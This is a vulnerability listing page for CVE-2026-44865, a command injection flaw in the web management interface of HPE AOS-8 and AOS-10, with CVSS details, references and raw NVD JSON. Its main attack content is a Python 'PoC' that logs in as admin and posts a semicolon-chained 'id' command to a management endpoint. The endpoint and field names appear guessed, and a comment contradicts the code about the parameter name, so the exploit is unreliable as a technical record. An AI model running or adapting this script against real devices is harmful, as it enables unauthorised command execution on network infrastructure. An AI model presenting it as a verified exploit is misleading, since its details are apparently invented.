CVE-2026-44865

Description

Command injection vulnerabilities exist in the web-based management interface of AOS-8 and AOS-10 Operating Systems. Successful exploitation of these vulnerabilities could allow an authenticated remote attacker to execute arbitrary commands on the underlying operating system.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

HPE AOS-8

HPE AOS-10

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (example)
target_url = "https://<victim-ip>/api/v1/management/interface"

# Attacker credentials (required due to PR:H)
username = "admin"
password = "password"

# Malicious payload to execute 'id' command
# Using semicolon to chain commands
payload = "normal_value; id"

# Session management
session = requests.Session()
login_data = {"user": username, "pass": password}

# 1. Login to get authenticated session
login_response = session.post("https://<victim-ip>/login", data=login_data)
if login_response.status_code == 200:
    print("[+] Login successful")

    # 2. Send payload to the vulnerable endpoint
    # The application takes 'interface' parameter and executes it in a shell
    exploit_data = {"interface_name": payload}
    response = session.post(target_url, data=exploit_data)

    # 3. Check output
    if response.status_code == 200:
        print("[+] Exploit sent")
        print("Response:")
        print(response.text)
else:
    print("[-] Login failed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44865
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44865
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44865/
[4] VulDB https://vuldb.com/cve/CVE-2026-44865
[5] https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44865", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:45.137", "lastModified": "2026-05-12T20:16:45.137", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Command injection vulnerabilities exist in the web-based management interface of AOS-8 and AOS-10 Operating Systems. Successful exploitation of these vulnerabilities could allow an authenticated remote attacker to execute arbitrary commands on the underlying operating system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US", "source": "[email protected]"}]}}